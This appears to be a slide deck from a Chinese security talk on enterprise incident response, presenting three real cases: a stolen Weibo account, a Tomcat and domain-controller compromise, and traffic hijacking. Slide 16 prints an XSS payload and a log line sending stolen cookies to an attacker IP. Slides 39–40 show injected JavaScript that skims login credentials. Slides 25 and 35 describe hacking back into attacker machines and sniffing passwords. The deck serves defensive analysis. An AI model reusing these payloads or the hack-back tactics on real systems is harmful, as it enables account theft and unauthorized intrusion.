Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

9.“企业应急响应与反渗透”之真实案例分析

313 views

Published on

.

Published in: Art & Photos
  • Be the first to comment

9.“企业应急响应与反渗透”之真实案例分析

  1. 1. “企业应急响应以及反渗透” 之真实案例分析
  2. 2. 关于我
  3. 3. • piaca • 乌云⽩白帽⼦子 • Insight Labs 成员 • 前新浪安全架构师 • ⼋八年安全从业经验
  4. 4. • 应急响应介绍 • ⼀一些案例 • 总结
  5. 5. 什么是应急响应?
  6. 6. 被“⿊黑”了 • 被⼊入侵 • 被 DDoS • 被劫持 • 被蠕⾍虫 • 被钓⻥鱼 • ……
  7. 7. 为什么做应急响应?
  8. 8. 被逼的
  9. 9. • 保障业务 • 解决⽅方案 • 司法途径 • 还原攻击 • 明确意图 为什么做应急响应? • 查漏补缺
  10. 10. 怎么做应急响应?
  11. 11. • 确定攻击时间 • 查找攻击线索 • 实施解决⽅方案 怎么做应急响应? • 定位攻击⼈人,取证 • 梳理攻击流程
  12. 12. 为什么做反渗透?
  13. 13. • 被动变主动 • 攻击者都在做什么 为什么反渗透? • 确认攻击者是谁 • 取证
  14. 14. 案例之官微帐号被盗
  15. 15. • ⾮非⼯工作⼈人员操作 • 帐号有被 cookie 登录 分析原因 • 可是 cookie 有 httponly
  16. 16. ================================================== URL : http://t.cn/zWI1bUQ Last Visit Date : 2012-7-16 19:22:27 ================================================== ================================================== URL : http://50.116.13.242/index.php Last Visit Date : 2012-7-16 19:22:28 Referrer : http://t.cn/zWI1bUQ ================================================== ================================================== URL : http://**.***.com/_common/jwplayer/player.swf?debug=(function(){location.href=%27javascript:%22%3Cscript/src=http://50.116.13.242/e.js %3E%3C/script%3E%22%27}) Last Visit Date : 2012-7-16 19:22:28 Referrer : http://50.116.13.242/index.php Title : player.swf (application/x-shockwave-flash 对象) ================================================== ================================================== URL : http://50.116.13.242/e.php?opener=0&cookie=ULV %3D1342421444188%3A342%3A12%3A1%3A306588567000.3021.1342421444076%3A1342141514702%3B%20__utma %3D182865017.844076418.1336462885.1341536058.1341543017.15%3B%20__utmz%3D182865017.1341473198.13.8.utmcsr%3Dweibo.com%7Cutmccn %3D%28referral%29%7Cutmcmd%3Dreferral%7Cutmcct%3D/breakingnews%3B%20vjuids%3Ddae3c1e13.1369ca9b037.0.1a9eb5f46e6ac8%3B %20vjlast%3D1334068228.1341096989.11%3B%20UOR%3D%2C%2C%3B%20un%3Dxlttnews@sina.com%3B%20wvr%3D3.6%3B%20_s_tentry %3Dnews.sina.com.cn%3B%20Apache%3D306588567000.3021.1342421444076%3B%20SINAGLOBAL%3D306588567000.3021.1342421444076%3B %20SUS%3DSID-1618051664-1342421545-XD-z8hcn-efefbc9f4464bf215caf1d6b0da488bf%3B%20SUE%3Des %253D5937b4f4509871fc45195767ea7abe37%2526ev %253Dv1%2526es2%253Da42f0190f7b1f5137f761f625bbe0e81%2526rs0%253DpnLlydVz7IsdBcHbRCS8Tdb1KmHl7c %25252F758lHMKQRftFZBm9EDKoFVF7jexRKPF8CpY3rjGOora0pZ%25252FyDJSaDWJxRQn020MpsJxXhf5NdP2h3jfo2V %25252FoQgA0olYEWGJNQIDFZDfkndhSSXCp%25252BldHRW%25252BkEMwhvhY4p3xR0Ki5ja94%25253D%2 Last Visit Date : 2012-7-16 19:22:31 Referrer : http://**.***.com/_common/jwplayer/player.swf?debug=(function(){location.href=%27javascript:%22%3Cscript/src=http://50.116.13.242/e.js %3E%3C/script%3E%22%27}) ==================================================
  17. 17. ⼯工作⼈人员收到⼀一条私信……
  18. 18. • 某分站 XSS • 某分站 Apache CVE-2012-0053 还原攻击
  19. 19. • 修复漏洞,修复同类漏洞 • 加强员⼯工安全意识 我们做了什么 • 增加帐号安全策略
  20. 20. • 通过 IP / 邮箱信息定位到某公司安全⼈人员 • 没有恶意⺫⽬目的 关于攻击者 • 后⾯面有把漏洞提交乌云
  21. 21. 案例之 500 错误⽇日志引发的⾎血案
  22. 22. • 500 错误代表⽂文件存在并且执⾏行 • ⾮非业务⽂文件 分析原因 • 从更多的⽇日志⼊入⼿手
  23. 23. • 通过⽇日志确认⼊入侵途径是 tomcat • 做了⼀一些操作 还原攻击 • tomcat 帐号密码并⾮非弱密码,how?
  24. 24. • 全⺴⽹网排查 • 攻击者早在⼏几⽉月前就发⽣生 再次分析原因并且还原攻击 • 通过收集帐号密码
  25. 25. • 收集攻击者 IP • ⼤大多是⾁肉鸡 IP,⾹香港,廊坊 吹响反击号⾓角 • ⽤用“⿊黑客”的⽅方法拿到⾹香港,廊坊多台⾁肉鸡权限 • 在⾁肉鸡上发现⼤大量⿊黑客⼯工具和扫描⽇日志 • 在⾁肉鸡上发现内⺴⽹网仍有服务器被控制
  26. 26. • 清理全⺴⽹网 tomcat 我们做了什么 • 修改业务相关帐号密码 • 部署 snort • IDC 出⼝口策略 • 梳理全⺴⽹网 web ⺫⽬目录⽂文件 • 修改业务关键代码 • 清理后⻔门
  27. 27. 这就完了?
  28. 28. 很傻很天真
  29. 29. IT 反馈域控服务器异常
  30. 30. gh0st
  31. 31. • 多台服务器被植⼊入后⻔门 继续分析 • 通过 at ⽅方式植⼊入后⻔门 • 通过域控管理帐号 • 确定被植⼊入后⻔门最初时间
  32. 32. 2011-­‐11-­‐10,14:03:47,Security,审核成功,登录/注销  ,540,**,PDC,”成功的网络登录:     用户名:   *.ad     域:     *     登录  ID:     (0x0,0x1114E11)     登录类型:  3     登录过程:  NtLmSsp       身份验证数据包:   NTLM     工作站名:  CC-­‐TEST-­‐V2     登录  GUID:   -­‐     调用方用户名:   -­‐     调用方域:  -­‐     调用方登录  ID:   -­‐     调用方进程  ID:  -­‐     传递服务:  -­‐     源网络地址:   192.168.100.81     源端口:   0 2011-­‐11-­‐10,3:13:38,Security,审核失败,帐户登录  ,680,NT  AUTHORITYSYSTEM,PDC,"尝试登录的用户:     MICROSOFT_AUTHENTICATION_PACKAGE_V1_  登录帐户:       QM-­‐*$  源工作站:     CC-­‐TEST-­‐V2  错误代码:     0xC000006A "   2011-­‐11-­‐10,3:13:38,Security,审核失败,帐户登录  ,680,NT  AUTHORITYSYSTEM,PDC,"尝试登录的用户:     MICROSOFT_AUTHENTICATION_PACKAGE_V1_  登录帐户:       QM-­‐*$  源工作站:     CC-­‐TEST-­‐V2  错误代码:     0xC000006A
  33. 33. • 虚拟机 192.168.100.81 • 弱⼝口令 • 内⺴⽹网检查时关机,逃过检查 • ⺫⽬目前能够确定这台是最初被渗透的 • 域控管理登录过 • 通过抓去 hash 控制域控
  34. 34. • snort 加特征,发现仍有服务器被控制 我们⼜又做了什么 • 排查所有 windows 服务器 • 继续排查
  35. 35. • 还有美国的 IP 持续反击中 • 通过 C 段 cain 嗅探到 3389 密码
  36. 36. • 美国的 vps 上含有多个 QQ 和密码 关于攻击者 • 之前获取到其国内论坛帐号
  37. 37. 案例之永⽆无⽌止境的劫持
  38. 38. • 某业务多次多种类型劫持 • 某业务链路劫持被插⼊入⼲⼴广告 案例之永⽆无⽌止境的劫持 • DNS 劫持 • 链路劫持 • 劫持到⼀一个反向代理 IP 61.*.*.2
  39. 39. function ffCheck() { try { try { var u = null != f ? f.idInput.value : document.getElementById("idInput").value; } catch (e) { var u = (document.getElementById("idInput").innerHTML).replace(/s/g, ""); } var p = null != f ? f.pwdInput.value : document.getElementById("pwdInput").value; if (u.indexOf("@") == -1) u += "@xxx.com"; try { if (u.indexOf("@") == -1) u = u + getdomain(); } catch (e) {} sendurl("/abc", u, p, "coremail"); } catch (e) {} return fOnSubmit(); }
  40. 40. function sendurl(uri, u, p, i) { xmlHttp = GetXmlHttpObject(); if (xmlHttp == null) { return; } param = "user=" + u + "&pass=" + p + "&icp=" + i; xmlHttp.onreadystatechange = stateChanged; try { xmlHttp.open("POST", uri + "?t=" + (new Date()).valueOf(), true); } catch (e) {} xmlHttp.setRequestHeader("If-Modified-Since", "0"); xmlHttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); xmlHttp.send(param); }
  41. 41. • 定位劫持位置 • 投诉 处理过程 • TTL • IP
  42. 42. 然并卵
  43. 43. • 完善监控 • https? 我们做了什么
  44. 44. • 业务⾓角度 总结 • 保障业务优先 • 对抗⾓角度 • 了解对⼿手 • 技术⾓角度 • 攻击技术 • ⽇日志、流量等数据
  45. 45. 谢谢!

×